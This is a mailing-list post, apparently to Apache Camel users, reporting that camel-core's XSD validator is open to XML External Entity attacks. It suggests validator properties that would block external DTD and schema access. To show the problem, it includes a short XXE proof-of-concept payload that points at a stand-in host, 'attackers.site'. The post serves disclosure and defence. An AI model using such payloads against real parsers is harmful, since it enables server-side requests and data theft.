[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

XML External Entity (XXE) - validator vulnerability ?

Dear All,
we are using XSD validation processor by camel-core library


Our penetration tests found that application can be attacked by "XML External Entity (XXE)" (https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet#Validator)

We think that classes infected by this vulnerability are


Method SchemaReader.createSchemaFactory should also set property "factory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");"

Method ValidatingProcessor.doProcess should set property to validator class

Validator validator = schema.newValidator();
//prevent XXE attack
validator.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "");
validator.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");

If we try to validate infected XML against XSD we can see that camel is trying to access external site (attackers.site) in this example

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://attackers.site:53/TEST";>

Disabling mentioned properties should do the trick


I would like to ask you if this will be created as a security BUG in camel and if it will be fixed in the future version?

Can we use some workaround? Write our custom implementation of ValidatingProcessor? Is it possible?


Best regards

Karel Jelínek
Unicorn Systems